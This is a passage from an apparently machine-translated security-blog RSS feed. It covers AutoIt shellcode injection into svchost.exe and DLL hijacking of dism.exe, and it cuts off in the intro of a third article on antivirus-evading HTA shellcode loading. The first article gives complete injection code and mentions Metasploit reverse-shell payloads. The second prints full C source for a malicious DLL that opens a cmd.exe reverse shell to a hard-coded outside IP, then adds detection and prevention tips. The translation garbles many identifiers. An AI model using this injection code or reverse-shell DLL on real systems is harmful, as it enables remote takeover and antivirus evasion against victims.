<li>Jaw <strong>_Winapi_openprocess</strong> Like asking for an operating system to &#8220;open&#8221; the target process (here is SVCHOST.EXE, with code<strong> $ targetpid</strong> have been found earlier)</li>
<li><strong>Rights: $ process_all_access</strong> Request full access (read, record, execute) in this process</li>
<li><strong>Results: $ Hprocess</strong> is the &#8220;key&#8221; for us to manipulate that process. To make it easier as you need the key to enter another person&#39;s house <strong>$ Hprocess</strong> It is the key to opening SVCHOST.EXE</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">$hRegion = _MemVirtualAllocEx( _&#13;
    $hProcess, _&#13;
    0, _&#13;
    sizeof($shellcodeBuffer), _&#13;
    $MEM_COMMIT + $MEM_RESERVE, _&#13;
    $PAGE_READWRITE)</pre>
<ul>
<li>Jaw <strong>_Memvirtualallitex</strong> Create a &#8220;space&#8221; in the memory of the target process to save Shellcode. This space size is equal to the size of Shellcode (<strong>Sileoof ($ shellcodebuffer)</strong>)</li>
<li><strong>Access:</strong> $ Page_readwrite allows reading and writing in this gap. $ Mem_commit + $ mem_resere to make sure the space is used immediately and reserved</li>
<li><strong>Result:</strong> $ hregion is the address of the newly created space</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Local $written&#13;
_WinAPI_WriteProcessMemory ( _&#13;
$hProcess, _&#13;
$hRegion, _&#13;
_ptr($shellcodeBuffer), _&#13;
sizeof($shellcodeBuffer), _&#13;
$written)</pre>
<p>Jaw <strong>_Winapi_writeProcessmemory</strong> Copy the shellcode from &#8220;container box&#8221; (<strong>$ shellcodebuffer</strong>) In the space ($ hregion) in the process of SVCHOST.EXE</p>
<p><strong>Parameters: </strong></p>
<ul>
<li><strong>$ Hprocess:</strong> The key to the process of SCVHOST.EXE</li>
<li><strong>$ hregion:</strong> Empty room address</li>
<li><strong> _PTR ($ shellcodebuffe</strong>r): The cursor to Shellcode in the container</li>
<li><strong>Sileoof ($ shellcodebuffer):</strong> Data size to be copied</li>
<li><strong>$ written:</strong> Save the number of bytes stated (used for testing)</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">$protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _&#13;
    "hwnd", $hProcess, _&#13;
    "ptr", $hRegion, _&#13;
    "ulong_ptr", sizeof($shellcodeBuffer), _&#13;
    "uint", 0x20, _&#13;
    "uint*", 0)&#13;
$hProtect = $protectCall[0]</pre>
<ul>
<li><strong>Virtualprotectex</strong> Change the access of &#8220;empty rooms&#8221; from reading/recording (page_readwrite) to execution (0x20 is page_execute_Read).</li>
<li><strong>Why need:</strong> Shellcode is a code to run, so the memory area contains it must be allowed to &#8220;execute&#8221;</li>
<li><strong>Result:</strong> $ hprotect said whether the right to change is successful or not</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">$threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _&#13;
    "ptr", $hProcess, _&#13;
    "ptr", 0, _&#13;
    "int", 0, _&#13;
    "ptr", $hRegion, _&#13;
    "ptr", 0, _&#13;
    "int", 0, _&#13;
    "dword*", 0)&#13;
$hThread = $threadCall[0]</pre>
<p>Createremotethread creates a thread in the SVCHOST.EXE process to run Shellcode at $ Hregion</p>
<p><strong>Parameters: </strong></p>
<ul>
<li>$ Hprocess: The key to the process</li>
<li>$ hregion: Shellcode address to run</li>
<li>Other parameters to default (0)</li>
</ul>
<p><strong>Result:</strong> $ hthread is the identification code of the newly created thread</p>
<p>This is a complete code:<code/><code/></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#include <process.au3>&#13;
#include <memory.au3>&#13;
#include <winapi.au3>&#13;
#include <array.au3>&#13;
&#13;
Global $hexShellcode = "fc4883e4f"&#13;
&#13;
_CheckProcess()&#13;
_ProcessInjection()&#13;
&#13;
Func _CheckProcess()&#13;
    ConsoleWrite("[+] Checking for target process" &amp; @CRLF &amp; @CRLF)&#13;
&#13;
    Global $targetPID = Find_Process("svchost.exe")&#13;
&#13;
    If Not $targetPID = 0 Then&#13;
        Global $targetProcName = _ProcessGetName($targetPID)&#13;
        ConsoleWrite("[+] Target process is running (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)&#13;
&#13;
    ElseIf $targetPID = 0 Then&#13;
        ConsoleWrite("[!] Target process is not running. Exiting." &amp; @CRLF &amp; @CRLF)&#13;
        Exit&#13;
    EndIf&#13;
&#13;
EndFunc&#13;
&#13;
Func Find_Process($process)&#13;
    $loggedInUser = @UserName&#13;
    $processList = ProcessList()&#13;
    Dim $matchingProcesses[1]&#13;
&#13;
    For $i = 1 To $processList[0][0]&#13;
        $processName = $processList[$i][0]&#13;
        $processPID = $processList[$i][1]&#13;
&#13;
        If StringInStr($processName, $process) And _IsProcessOwner($processPID, $loggedInUser) Then&#13;
            ReDim $matchingProcesses[UBound($matchingProcesses) + 1]&#13;
            $matchingProcesses[UBound($matchingProcesses) - 1] = $processPID&#13;
        EndIf&#13;
    Next&#13;
&#13;
    If UBound($matchingProcesses) &gt; 1 Then&#13;
        $randomIndex = Random(1, UBound($matchingProcesses) - 1, 1)&#13;
        $randomPID = $matchingProcesses[$randomIndex]&#13;
        Return $randomPID&#13;
    Else&#13;
        Return ""&#13;
    EndIf&#13;
EndFunc&#13;
&#13;
Func _ProcessInjection()&#13;
    Local $autoItshellcode = "0x" &amp; $hexShellcode&#13;
    Local $shellcodeBuffer = DllStructCreate("byte[" &amp; BinaryLen($autoItshellcode) &amp; "]")&#13;
    DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)&#13;
    ConsoleWrite("[+] Shellcode size: " &amp; sizeof($shellcodeBuffer) &amp; " bytes" &amp; @CRLF &amp; @CRLF)&#13;
    ConsoleWrite("[+] Injecting shellcode into PID:" &amp; $targetPID &amp; " (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)&#13;
&#13;
    $hProcess = _WinAPI_OpenProcess( _&#13;
        $PROCESS_ALL_ACCESS, _&#13;
        0, _&#13;
        $targetPID, _&#13;
        True)&#13;
&#13;
    $hRegion = _MemVirtualAllocEx( _&#13;
        $hProcess, _&#13;
        0, _&#13;
        sizeof($shellcodeBuffer), _&#13;
        $MEM_COMMIT + $MEM_RESERVE, _&#13;
        $PAGE_READWRITE)&#13;
&#13;
    Local $written&#13;
&#13;
    _WinAPI_WriteProcessMemory ( _&#13;
        $hProcess, _&#13;
        $hRegion, _&#13;
        _ptr($shellcodeBuffer), _&#13;
        sizeof($shellcodeBuffer), _&#13;
        $written)&#13;
&#13;
    $protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _&#13;
        "hwnd", $hProcess, _&#13;
        "ptr", $hRegion, _&#13;
        "ulong_ptr", sizeof($shellcodeBuffer), _&#13;
        "uint", 0x20, _&#13;
        "uint*", 0)&#13;
&#13;
    $hProtect = $protectCall[0]&#13;
&#13;
    $threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _&#13;
        "ptr", $hProcess, _&#13;
        "ptr", 0, _&#13;
        "int", 0, _&#13;
        "ptr", $hRegion, _&#13;
        "ptr", 0, _&#13;
        "int", 0, _&#13;
        "dword*", 0)&#13;
&#13;
    $hThread = $threadCall[0]&#13;
&#13;
EndFunc&#13;
&#13;
Func _ptr($s, $e = "")&#13;
    If $e &lt;&gt; "" Then Return DllStructGetPtr($s, $e)&#13;
    Return DllStructGetPtr($s)&#13;
EndFunc&#13;
&#13;
Func sizeof($s)&#13;
    Return DllStructGetSize($s)&#13;
EndFunc&#13;
&#13;
Func _IsProcessOwner($processPID, $username)&#13;
    Local $aWMI = ObjGet("winmgmts:\\.\root\cimv2")&#13;
    Local $colItems = $aWMI.ExecQuery("Select * from Win32_Process where ProcessID=" &amp; $processPID)&#13;
&#13;
    For $objItem In $colItems&#13;
        If $objItem.GetOwner() = $username Then&#13;
            Return 1&#13;
        EndIf&#13;
    Next&#13;
    Return 0&#13;
EndFunc</array.au3></winapi.au3></memory.au3></process.au3></pre>
<h2 id="ftoc-tong-ket-cach-hoat-dong-cua-toan-bo-code" class="ftwp-heading"><strong>Summarize the operation of the entire code</strong></h2>
<p>1. <strong>_Checkprocess () and find_process ():</strong> Find and check if svchost.exe runs, choose a suitable PID.</p>
<p>2. <strong>_Processinjection ():</strong> Inject Shellcode into the target process through 6 steps (preparing, opening the process, allocating memory, recording shellcode, granting the right to execute, running Shellcode)</p>
<p>3. <strong>Support functions (_PTr, Sizeof, _Sprocessowner):</strong> Help handle details such as taking addresses, sizes, and verifying ownership</p>
<p><strong>Result:</strong> Shellcode will run in svchost.exe. However, with <strong>$ Hexshellcode = &#8220;FC4883E4F&#8221;</strong>This is just a sample section, so you need a full shellcode (for example from Metasploit)</p>
<p>And here is the result:</p>
<p>Okay, now I will create a Payload Reverse Shell HTTPS from Metasploit, then try to see if Antivirus has discovered or not. Please see the demo:</p>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="Shellcode Injection" src="https://streamable.com/o/2rurh6#?secret=ZIzKrK4OJT" data-secret="ZIzKrK4OJT" frameborder="0" scrolling="no" width="2010" height="1080"></iframe></p>
<p>Through this article, we have discovered how to use Autoit to perform the technique <strong>Shellcode Injection</strong>. Understanding it not only helps you understand how hackers invade, but also the foundation to build more effective defensive measures. I hope that you can perform this technique only to test in a safe environment and use this knowledge in a responsible way to protect the system, instead of causing harm. Wishing you success on the journey to explore the world security world!</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-implement-shellcode-injection-attack-technique-with-autoit/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2025/03/shellcode-injection.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to exploit the holy hole of Hijacking on Windows</title>
		<link>https://en.anonyviet.com/how-to-exploit-the-holy-hole-of-hijacking-on-windows/</link>
					<comments>https://en.anonyviet.com/how-to-exploit-the-holy-hole-of-hijacking-on-windows/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 07 Mar 2025 22:51:16 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Hijacking]]></category>
		<category><![CDATA[hole]]></category>
		<category><![CDATA[holy]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=18438</guid>

					<description><![CDATA[Dll hijacking &#8211; The name sounds somewhat mysterious, but it is an interesting attack technique that anyone who cares about security wants to explore. On the Windows operating system, the programs depend a lot on the DLL file (Dynamic Link Library) to operate smoothly. But if a cunning hacker replaces the original DLL with a [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><strong>Dll hijacking</strong> &#8211; The name sounds somewhat mysterious, but it is an interesting attack technique that anyone who cares about security wants to explore. On the Windows operating system, the programs depend a lot on the DLL file (Dynamic Link Library) to operate smoothly. But if a cunning hacker replaces the original DLL with a &#8220;toxic&#8221; version, what will happen?</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">&#13;</p>
<tbody>&#13;</p>
<tr>&#13;</p>
<td style="width: 100%; text-align: center;">&#13;<br />
                        <span style="font-size: 12pt;">&#13;<br />
                            <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">Anonyviet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong>&#13;<br />
                        </span>&#13;
                    </td>
<p>&#13;<br />
                </tr>
<p>&#13;<br />
            </tbody>
<p>&#13;<br />
        </table>
</p></div>
<p><strong>Important note:</strong> This article only serves the purpose of learning and research. Anonyviet does not encourage any illegal behavior, and you need to be responsible for your actions!</p>
<h2 id="ftoc-dll-hijacking-la-gi" class="ftwp-heading"><strong>What is Dll Hijacking?</strong></h2>
<p>DLL Hijacking is a gap technique when the program does not strictly control the DLL file. When an application like DISM.EXE (Windows system management tool) runs, it will search for the DLL needed in a series of folders in the order of priority.</p>
<p>If the hacker puts a fake DLL in the directory that the program checks before coming to the Orthodox folder (such as System32), the application will &#8220;innocent&#8221; download malware instead of the original DLL. This is the &#8220;gap&#8221; that security experts &#8211; or hackers &#8211; can take advantage.</p>
<figure id="attachment_82303" aria-describedby="caption-attachment-82303" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82303 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-1.jpg" alt="What is Dll Hijacking?" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 12" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-1.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-1-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82303" class="wp-caption-text">What is Dll Hijacking?</figcaption></figure>
<h2 id="ftoc-tai-sao-dism-exe-la-muc-tieu-ly-tuong" class="ftwp-heading"><strong>Why is dism.exe an ideal goal?</strong></h2>
<p>DISM.EXE is a built -in tool in Windows, usually located in C: \ Windows \ System32. Because of its popularity and role in managing the system, DISM.EXE became an attractive &#8220;prey&#8221; to test the DLL Hijacking. Moreover, the way Windows search DLL is sometimes lacking, opening up opportunities for sophisticated attacks.</p>
<h2 id="ftoc-huong-dan-khai-thac-dll-hijacking-voi-process-monitor" class="ftwp-heading"><strong>Guide to exploit dll hijacking with process monitor</strong></h2>
<p>To exploit this gap, we need a process monitor tool from Sysinternals. This is a &#8220;powerful assistant&#8221; to help you track how the system interacts with DLL files. Here are the detailed steps:</p>
<h3 id="ftoc-buoc-1-chuan-bi-moi-truong-thu-nghiem" class="ftwp-heading"><strong>Step 1: Prepare the testing environment</strong></h3>
<figure id="attachment_82304" aria-describedby="caption-attachment-82304" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82304 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-2.jpg" alt="Download Process Monitor" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 13" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-2.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-2-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82304" class="wp-caption-text">Download Process Monitor</figcaption></figure>
<ul>
<li>To be safe, use VirtualBox or <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fcach-tai-vmware-workstation-pro-va-fusion-pro%2F" class="local-link">Vmware</a> Instead of trying directly on the main machine.</li>
<li>Select the goal: Here, I choose Dism.exe, but you can apply this method to any program.</li>
</ul>
<h3 id="ftoc-buoc-2-theo-doi-hanh-vi-cua-dism-exe" class="ftwp-heading"><strong>Step 2: Monitor the behavior of dism.exe</strong></h3>
<p>Open Process Monitor, you will see a series of system events recorded. Don&#39;t panic! Set the filter to focus:</p>
<ul>
<li>Press <strong>Ctrl + L</strong> (or go to Filter> Filter).</li>
<li>Add conditions: <strong>Process Name &#8211; IS &#8211; DISM.EXE &#8211; Include</strong> and <strong>Path &#8211; Contains</strong><br /><strong>&#8211; .dll &#8211; Include</strong></li>
</ul>
<figure id="attachment_82305" aria-describedby="caption-attachment-82305" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82305 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-3.jpg" alt="Add conditions" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 14" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-3.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-3-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82305" class="wp-caption-text">Add conditions</figcaption></figure>
<ul>
<li>Press <strong>Add</strong> Already <strong>OK</strong>. Now Process Monitor only shows activities related to DISM.EXE and DLL.</li>
</ul>
<h3 id="ftoc-buoc-3-chay-dism-exe-va-quan-sat" class="ftwp-heading"><strong>Step 3: Run Dism.exe and observe</strong></h3>
<ul>
<li>Open PowerShell, type<strong> C: \ Windows \ System32 \ DISM.EXE</strong> and click Enter.</li>
<li>Back to Process Monitor, you will see the list of DLLs that Dism.exe try to download.</li>
</ul>
<figure id="attachment_82306" aria-describedby="caption-attachment-82306" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82306 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-4.jpg" alt="List of DLLs that DISM.EXE tries to download" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 15" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-4.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-4-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82306" class="wp-caption-text">List of DLLs that DISM.EXE tries to download</figcaption></figure>
<ul>
<li>If the result column displays &#8220;<strong>Name not found</strong>It is a sign that the program can be exploited DLL Hijacking.</li>
</ul>
<p>For example, I discovered the file <strong>C: \ Windows \ System32 \ Dismcore.dll</strong> Can be exploited.</p>
<figure id="attachment_82307" aria-describedby="caption-attachment-82307" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82307 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-5.jpg" alt="Program signs can be exploited DLL Hijacking" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 16" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-5.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-5-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82307" class="wp-caption-text">Program signs can be exploited DLL Hijacking</figcaption></figure>
<h3 id="ftoc-buoc-4-tao-dll-gia-mao" class="ftwp-heading"><strong>Step 4: Create fake DLL</strong></h3>
<ul>
<li>Copy dism.exe to the %Temp %folder.</li>
</ul>
<figure id="attachment_82308" aria-describedby="caption-attachment-82308" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82308 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-6.jpg" alt="Copy dism.exe into the %temp %folder" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 17" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-6.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-6-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82308" class="wp-caption-text">Copy dism.exe into the %temp %folder</figcaption></figure>
<ul>
<li>Create a toxic dismcore.dll file. Here I created a Payload Reverse Shell called DISMCORE.CPP and translated into Dismcore.dll file with Visual Studio then copied it to the % Temp % directory and ran the dism.exe file again</li>
</ul>
<p><code>#define REVERSEIP "193.161.193.99" #địa chỉ ip máy hacker</code><br /><code>#define REVERSEPORT 52543 #port máy hacker</code></p>
<p><code>#include <winsock2.h/></code><br /><code>#include <stdio.h/></code></p>
<p><code>#pragma comment(lib,"ws2_32")</code></p>
<p><code>WSADATA wsaData;</code><br /><code>SOCKET Winsock; </code><br /><code>SOCKET Sock; </code><br /><code>struct sockaddr_in hax;</code></p>
<p><code>STARTUPINFO ini_processo;</code><br /><code>PROCESS_INFORMATION processo_info;</code></p>
<p><code>BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)</code><br /><code>{ </code><br /><code>WSAStartup(MAKEWORD(2,2), &amp;wsaData);</code><br /><code>Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);</code></p>
<p><code>hax.sin_family = AF_INET; </code><br /><code>hax.sin_port = htons(REVERSEPORT);</code><br /><code>hax.sin_addr.s_addr = inet_addr(REVERSEIP);</code></p>
<p><code>WSAConnect(Winsock,(SOCKADDR*)&amp;hax,sizeof(hax),NULL,NULL,NULL,NULL);</code></p>
<p><code>memset(&amp;ini_processo,0,sizeof(ini_processo));</code><br /><code>ini_processo.cb=sizeof(ini_processo); </code><br /><code>ini_processo.dwFlags=STARTF_USESTDHANDLES; </code><br /><code>ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;</code></p>
<p><code>CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&amp;ini_processo,&amp;processo_info); </code><br /><code>return TRUE;</code><br /><code>}</code></p>
<figure id="attachment_82309" aria-describedby="caption-attachment-82309" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82309 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-7.jpg" alt="Create a toxic dismcore.dll file" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 18" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-7.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-7-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82309" class="wp-caption-text">Create a toxic dismcore.dll file</figcaption></figure>
<h3 id="ftoc-buoc-5-kiem-tra-ket-qua" class="ftwp-heading"><strong>Step 5: Check the results</strong></h3>
<p>Run Dism.exe from %Temp %. If successful, a Reverse Shell connection will be sent to IP and port you have defined. Hackers can now control the machine remote!</p>
<h2 id="ftoc-cach-phat-hien-va-phong-chong-dll-hijacking" class="ftwp-heading"><strong>How to detect and prevent dll hijacking</strong></h2>
<p>Understanding how to exploit is one thing, but protecting the system from DLL Hijacking is another challenge. Here&#39;s how to identify and prevent:</p>
<h3 id="ftoc-cach-phat-hien-dll-hijacking" class="ftwp-heading"><strong>How to detect dll hijacking</strong></h3>
<h4 id="ftoc-1-kham-pha-bang-process-monitor" class="ftwp-heading"><strong>1. Explore by Process Monitor</strong></h4>
<p>This is an effective tool to track the DLL download program: Observe the application&#39;s operation and search for the &#8220;name not found&#8221; line in the result column, when it tries to take DLL from non -security positions (such as the directory is in use or outside the System32).</p>
<p>If the DLL search application in places is susceptible to the bad guy who inserts a fake file before going to the standard folder, which is a potential sign.</p>
<figure id="attachment_82310" aria-describedby="caption-attachment-82310" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82310 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-8.jpg" alt="How to detect dll hijacking" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 19" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-8.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-8-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82310" class="wp-caption-text">How to detect dll hijacking</figcaption></figure>
<h4 id="ftoc-2-tan-dung-dllspy" class="ftwp-heading"><strong>2. Take advantage of DLLSPY</strong></h4>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fcyberark%2FDLLSpy" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Dllspy</a> Is a compact, specialized solution to detect the risk of dll hijacking:</p>
<p><strong>How to do it:</strong></p>
<ol>
<li>Start DLLSPY on the computer.</li>
<li>The tool will review the running processes, checking how they search DLL.</li>
<li>DLLSPY offers a list of applications that may be attacked if they prioritize DLL from unreliable folders (such as personal directory or abnormal paths).</li>
</ol>
<p><strong>Strengths:</strong> DLLSPY automates the analysis, helping to quickly indicate vulnerable software without manual manipulation as with Process Monitor.</p>
<p>For example, when checking DISM.EXE, DLLSPY may detect whether it looks for dismcore.dll outside the system32.</p>
<h4 id="ftoc-3-kiem-tra-trinh-tu-tai-dll-qua-dependency-walker" class="ftwp-heading"><strong>3. Check the DLL download sequence via Dependency Walker</strong></h4>
<p>Download <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.dependencywalker.com%2F" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Dependency Walker</a> (Free) To consider the DLL that the software needs to use.<br />Run the application in this tool, then observe the DLL list and the loading path. If DLL is found to be taken from an unofficial place, it is a warning signal.</p>
<h4 id="ftoc-4-luu-y-dau-hieu-bat-thuong" class="ftwp-heading"><strong>4.</strong></h4>
<ul>
<li>When a familiar software (such as dism.exe) works strange (displaying strange messages or having errors), it is likely that DLL has been replaced.</li>
<li>Use Task Manager or Process Explorer to check the related processes and verify the file origin.</li>
</ul>
<h3 id="ftoc-nhung-bien-phap-ngan-ngua-lo-hong-dll-hijacking" class="ftwp-heading"><strong>Measures to prevent DLL hole Hijacking</strong></h3>
<h4 id="ftoc-1-gioi-han-quyen-truy-cap-thu-muc" class="ftwp-heading"><strong>1. Limit access to folders</strong></h4>
<ul>
<li>Make sure that only administrators are allowed to record data in important folders such as C: \ Windows \ System32.</li>
<li>Avoid launching applications from unsafe places (for example: C: \ Downloads), because the attacker can place fake DLL there.</li>
</ul>
<figure id="attachment_82311" aria-describedby="caption-attachment-82311" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82311 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-9.jpg" alt="Measures to prevent DLL hole Hijacking" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 20" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-9.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-9-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82311" class="wp-caption-text">Measures to prevent DLL hole Hijacking</figcaption></figure>
<h4 id="ftoc-2-ap-dung-duong-dan-co-dinh-trong-lap-trinh" class="ftwp-heading"><strong>2. Apply fixed path in programming</strong></h4>
<p>If you develop the software, configure the program to call DLL with a clear link (like C: \ Windows \ System32 \ Dismcore.dll), instead of letting it freely search.</p>
<h4 id="ftoc-3-bat-che-do-safedllsearchmode" class="ftwp-heading"><strong>3. Turn on Safedllsearchmode mode</strong></h4>
<p>Check and set the SafedllsearchMode value in the Registry (at <strong>Hkey_local_machine \ System \ CurrentControlset \ Control \ Session Manager</strong>) into 1, to prioritize the first system folders.</p>
<h4 id="ftoc-4-trien-khai-cong-cu-bao-ve" class="ftwp-heading"><strong>4. Deploying protection tools</strong></h4>
<p>Use anti -virus or anti -malicious software (such as MalwareStes, Kaspersky, &#8230;) to identify and prevent dangerous DLLs promptly.</p>
<h2 id="ftoc-ket-luan" class="ftwp-heading"><strong>Conclude</strong></h2>
<p><strong>Dll hijacking</strong> Not only is an attack technique but also a warning about the importance of software security. With tools like Process Monitor, you can both exploit and prevent this hole effectively. The world of security is still countless interesting things waiting for you to explore. Start today, turn your knowledge into strength and always be careful in every step!</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-exploit-the-holy-hole-of-hijacking-on-windows/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Hamamal: Shellcode execution technique from afar to overcome Antivirus&#039;s discovery</title>
		<link>https://en.anonyviet.com/hamamal-shellcode-execution-technique-from-afar-to-overcome-antiviruss-discovery/</link>
					<comments>https://en.anonyviet.com/hamamal-shellcode-execution-technique-from-afar-to-overcome-antiviruss-discovery/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 10 Feb 2025 12:23:52 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[afar]]></category>
		<category><![CDATA[Antivirus39s]]></category>
		<category><![CDATA[discovery]]></category>
		<category><![CDATA[execution]]></category>
		<category><![CDATA[Hamamal]]></category>
		<category><![CDATA[overcome]]></category>
		<category><![CDATA[Shellcode]]></category>
		<category><![CDATA[technique]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=18179</guid>

					<description><![CDATA[The execution of malicious code without being detected by antivirus software (antivirus) is a significant challenge for both attacking and defensive. Today, we will discover a tool named Hamalan innovative method for execution Shellcode remotely In Windows environment, simultaneously Overcoming the detection mechanism of antivirus effectively. This technique uses HTA (HTML Application) and JavaScriptallowing attackers [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>The execution of malicious code without being detected by antivirus software (antivirus) is a significant challenge for both attacking and defensive. Today, we will discover a tool named <strong>Hamal</strong>an innovative method for execution <strong>Shellcode remotely</strong> In Windows environment, simultaneously <strong>Overcoming the detection mechanism of antivirus</strong> effectively. This technique uses <strong>HTA (HTML Application) and JavaScript</strong>allowing attackers to load and execute Shellcode directly remotely, thereby minimizing the possibility of being detected. Okay, not long anymore the main problem!</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
